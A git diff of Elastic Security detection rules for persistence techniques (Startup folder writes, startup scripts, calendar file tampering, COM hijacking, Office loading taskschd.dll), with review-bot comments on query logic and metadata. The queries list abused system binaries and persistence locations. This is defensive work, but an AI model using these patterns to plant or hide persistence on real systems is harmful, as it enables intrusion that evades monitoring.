This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "file where event.type != \"deletion\" and\n user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\") and\n process.name : (\"cmd.exe\",\n \"powershell.exe\",\n \"wmic.exe\",\n \"mshta.exe\",\n \"pwsh.exe\",\n \"cscript.exe\",\n \"wscript.exe\",\n \"regsvr32.exe\",\n \"RegAsm.exe\",\n \"rundll32.exe\",\n \"EQNEDT32.EXE\",\n \"WINWORD.EXE\",\n \"EXCEL.EXE\",\n \"POWERPNT.EXE\",\n \"MSPUB.EXE\",\n \"MSACCESS.EXE\",\n \"iexplore.exe\",\n \"InstallUtil.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "440e2db4-bc7f-4c96-a068-65b78da59bde", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_startup_folder_file_written_by_unsigned_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_startup_folder_file_written_by_unsigned_process.json index a6b891b446d10..8879d753f8ede 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_startup_folder_file_written_by_unsigned_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_startup_folder_file_written_by_unsigned_process.json 
@@ -12,6 +12,43 @@ "name": "Startup Folder Persistence via Unsigned Process", "note": "## Triage and analysis\n\n### Investigating Startup Folder Persistence via Unsigned Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account\nlogon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for unsigned processes writing to the Startup folder locations.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate\nsoftware installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to Startup folders. This activity could be based\non new software installations, patches, or any kind of network administrator related activity. 
Before entering further\ninvestigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan=5s\n [process where event.type in (\"start\", \"process_started\") and process.code_signature.trusted == false and\n /* suspicious paths can be added here */\n process.executable : (\"C:\\\\Users\\\\*.exe\", \n \"C:\\\\ProgramData\\\\*.exe\", \n \"C:\\\\Windows\\\\Temp\\\\*.exe\", \n \"C:\\\\Windows\\\\Tasks\\\\*.exe\", \n \"C:\\\\Intel\\\\*.exe\", \n \"C:\\\\PerfLogs\\\\*.exe\")\n ]\n [file where event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\", \n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\")\n ]\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], "risk_score": 41, "rule_id": "2fba96c0-ade5-4bce-b92f-a5df2509da3f", "severity": "medium", @@ -47,5 +84,5 @@ } ], "type": "eql", - "version": 4 + "version": 5 } 
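Review bot: The new `required_fields` entry declaring `process.code_signature.trusted` as a boolean makes it worth documenting that the query's `process.code_signature.trusted == false` (context line, unchanged) only matches events that actually carry that field; in EQL a comparison against a missing field does not evaluate true, so process starts from data sources that do not populate `process.code_signature` are silently excluded rather than treated as unsigned. Consider a sentence in the rule's `note` such as "This rule requires the `process.code_signature.trusted` field to be populated; sources that omit code-signature data will not produce alerts." The `note` itself is outside this hunk.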
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_startup_folder_scripts.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_startup_folder_scripts.json index 477219cf010bf..d43fbf0049438 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_startup_folder_scripts.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_startup_folder_scripts.json 
@@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistent Scripts in the Startup Directory", - "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account\nlogon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate\nsoftware installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "file where event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n \n /* detect shortcuts created by wscript.exe or cscript.exe */\n (file.path : \"C:\\\\*\\\\Programs\\\\Startup\\\\*.lnk\" and\n process.name : (\"wscript.exe\", \"cscript.exe\")) or\n\n /* detect vbs or js files created by any process */\n file.path : (\"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbs\", \n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbe\", \n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsh\", \n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsf\", \n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.js\")\n", + "note": "## Triage and analysis\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account\nlogon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate\nsoftware installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "file where event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n\n /* detect shortcuts created by wscript.exe or cscript.exe */\n (file.path : \"C:\\\\*\\\\Programs\\\\Startup\\\\*.lnk\" and\n process.name : (\"wscript.exe\", \"cscript.exe\")) or\n\n /* detect vbs or js files created by any process */\n file.path : (\"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbs\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.vbe\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsh\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.wsf\",\n \"C:\\\\*\\\\Programs\\\\Startup\\\\*.js\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } 
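Review bot: The reformatted `"query"` on the added line keeps an operator-precedence problem: in EQL `and` binds tighter than `or`, so `event.type != "deletion" and user.domain != "NT AUTHORITY"` only gates the `.lnk` branch, and the `file.path : ("C:\\*\\Programs\\Startup\\*.vbs", ...)` branch fires on deletions and on NT AUTHORITY activity as well. Since the line is being rewritten anyway, the two alternatives should be grouped, e.g. `file where event.type != "deletion" and user.domain != "NT AUTHORITY" and (` before the `/* detect shortcuts ... */` comment and a closing `)` after the `"C:\\*\\Programs\\Startup\\*.js")` list. The `required_fields` and version bump in this hunk are otherwise consistent with the query.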
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_calendar_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_calendar_modification.json index 97a3de8f4060d..2607dbaae4ff3 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_calendar_modification.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_calendar_modification.json 
@@ -14,12 +14,34 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious Calendar File Modification", - "query": "event.category:file and event.action:modification and\n file.path:/Users/*/Library/Calendars/*.calendar/Events/*.ics and\n process.executable:\n (* and not \n (\n /System/Library/* or \n /System/Applications/Calendar.app/Contents/MacOS/* or \n /usr/libexec/xpcproxy or \n /sbin/launchd or \n /Applications/*\n )\n )\n", + "query": "event.category:file and event.action:modification and\n file.path:/Users/*/Library/Calendars/*.calendar/Events/*.ics and\n process.executable:\n (* and not\n (\n /System/Library/* or\n /System/Applications/Calendar.app/Contents/MacOS/* or\n /System/Applications/Mail.app/Contents/MacOS/Mail or\n /usr/libexec/xpcproxy or\n /sbin/launchd or\n /Applications/*\n )\n )\n", "references": [ "https://labs.f-secure.com/blog/operationalising-calendar-alerts-persistence-on-macos", "https://github.com/FSecureLABS/CalendarPersist", "https://github.com/D00MFist/PersistentJXA/blob/master/CalendarPersist.js" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "cb71aa62-55c8-42f0-b0dd-afb0bb0b1f51", "severity": "medium", @@ -49,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_com_hijack_registry.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_com_hijack_registry.json index bb31786d8fb91..68361ed513c63 100644 
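Review bot: The new exclusion `/System/Applications/Mail.app/Contents/MacOS/Mail` in the `process.executable` filter carries no visible rationale, and a KQL string cannot hold a comment. The rule's note or false-positive guidance (outside this hunk) should record why Mail legitimately writes `.ics` files under `/Users/*/Library/Calendars/`, so a later tuning pass neither widens nor drops the exclusion blindly. The added `required_fields` entries match the four fields the query reads.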
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_com_hijack_registry.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_com_hijack_registry.json
@@ -10,13 +10,41 @@ "language": "eql", "license": "Elastic License v2", "name": "Component Object Model Hijacking", - "note": "## Triage and analysis\n\n### Investigating Component Object Model Hijacking\n\nAdversaries can insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means of persistence.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file referenced in the registry and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- Some Microsoft executables will reference the LocalServer32 registry key value for the location of external COM objects.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment 
for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "registry where\n (registry.path : \"HK*}\\\\InprocServer32\\\\\" and registry.data.strings: (\"scrobj.dll\", \"C:\\\\*\\\\scrobj.dll\") and\n not registry.path : \"*\\\\{06290BD*-48AA-11D2-8432-006008C3FBFC}\\\\*\") \n or\n /* in general COM Registry changes on Users Hive is less noisy and worth alerting */\n (registry.path : (\"HKEY_USERS\\\\*Classes\\\\*\\\\InprocServer32\\\\\",\n \"HKEY_USERS\\\\*Classes\\\\*\\\\LocalServer32\\\\\",\n \"HKEY_USERS\\\\*Classes\\\\*\\\\DelegateExecute\\\\\", \n 
\"HKEY_USERS\\\\*Classes\\\\*\\\\TreatAs\\\\\", \n \"HKEY_USERS\\\\*Classes\\\\CLSID\\\\*\\\\ScriptletURL\\\\\") and\n not (process.executable : \"?:\\\\Program Files*\\\\Veeam\\\\Backup and Replication\\\\Console\\\\veeam.backup.shell.exe\" and\n registry.path : \"HKEY_USERS\\\\S-1-5-21-*_Classes\\\\CLSID\\\\*\\\\LocalServer32\\\\\") and\n /* not necessary but good for filtering privileged installations */\n user.domain != \"NT AUTHORITY\"\n ) and\n /* removes false-positives generated by OneDrive and Teams */\n not process.name : (\"OneDrive.exe\",\"OneDriveSetup.exe\",\"FileSyncConfig.exe\",\"Teams.exe\") and\n /* Teams DLL loaded by regsvr */\n not (process.name: \"regsvr32.exe\" and\n registry.data.strings : \"*Microsoft.Teams.*.dll\")\n", + "note": "## Triage and analysis\n\n### Investigating Component Object Model Hijacking\n\nAdversaries can insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means of persistence.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file referenced in the registry and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- Some Microsoft executables will reference the LocalServer32 registry key value for the location of external COM objects.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems 
compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "registry where\n (registry.path : \"HK*}\\\\InprocServer32\\\\\" and registry.data.strings: (\"scrobj.dll\", \"C:\\\\*\\\\scrobj.dll\") and\n not registry.path : \"*\\\\{06290BD*-48AA-11D2-8432-006008C3FBFC}\\\\*\")\n or\n /* in general COM Registry changes on Users Hive is less noisy and worth alerting */\n (registry.path : (\"HKEY_USERS\\\\*Classes\\\\*\\\\InprocServer32\\\\\",\n \"HKEY_USERS\\\\*Classes\\\\*\\\\LocalServer32\\\\\",\n \"HKEY_USERS\\\\*Classes\\\\*\\\\DelegateExecute\\\\\",\n \"HKEY_USERS\\\\*Classes\\\\*\\\\TreatAs\\\\\",\n \"HKEY_USERS\\\\*Classes\\\\CLSID\\\\*\\\\ScriptletURL\\\\\") and\n not (process.executable : \"?:\\\\Program Files*\\\\Veeam\\\\Backup and Replication\\\\Console\\\\veeam.backup.shell.exe\" and\n registry.path : \"HKEY_USERS\\\\S-1-5-21-*_Classes\\\\CLSID\\\\*\\\\LocalServer32\\\\\") and\n /* not necessary but good for filtering privileged installations */\n user.domain != \"NT AUTHORITY\"\n ) and\n /* removes false-positives generated by OneDrive and Teams */\n not process.name : (\"OneDrive.exe\",\"OneDriveSetup.exe\",\"FileSyncConfig.exe\",\"Teams.exe\") and\n /* Teams DLL loaded by regsvr */\n not (process.name: \"regsvr32.exe\" and\n registry.data.strings : \"*Microsoft.Teams.*.dll\")\n", "references": [ 
"https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/" ], + "required_fields": [ + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "16a52c14-7883-47af-8745-9357803f0d4c", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -51,5 +79,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_image_load_scheduled_task_ms_office.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_image_load_scheduled_task_ms_office.json index 6798f8986ae5f..fd8f98d16a82e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_image_load_scheduled_task_ms_office.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_image_load_scheduled_task_ms_office.json 
@@ -12,14 +12,42 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Image Load (taskschd.dll) from MS Office", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "library where process.name : (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\", \"MSPUB.EXE\", \"MSACCESS.EXE\") and\n event.action : \"load\" and\n event.category : \"library\" and\n dll.name : \"taskschd.dll\"\n", + "note": "", + "query": "any where\n (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n process.name : (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\", \"MSPUB.EXE\", \"MSACCESS.EXE\") and\n (dll.name : \"taskschd.dll\" or file.name : \"taskschd.dll\")\n", "references": [ "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", "https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf" ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "baa5d22c-5e1c-4f33-bfc9-efa73bb53022", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": 
[ "Elastic", @@ -47,5 +75,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_scheduled_task_runtime.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_scheduled_task_runtime.json index d85587bc57856..dd84aa829f797 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_scheduled_task_runtime.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_suspicious_scheduled_task_runtime.json 
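Review bot: `"note": ""` on the new side replaces the investigation guide with an empty string now that the Config paragraph has moved into `setup`; the persistence_suspicious_scheduled_task_runtime.json hunk does the same. An empty note renders nothing for the analyst, so either drop the key or supply a short triage note in the shape the sibling rules in this diff use (a "Triage and analysis" heading with investigation steps, false-positive analysis, and response and remediation), which for this rule would cover identifying the document or add-in that drove the Office process to load taskschd.dll and checking whether a scheduled task was created afterwards. The rewritten query `any where (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) … (dll.name : "taskschd.dll" or file.name : "taskschd.dll")` appears to add a second event source (an "Image loaded"-style process event carrying the image in `file.name`), which the note should also mention so analysts know both sources can raise the alert.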
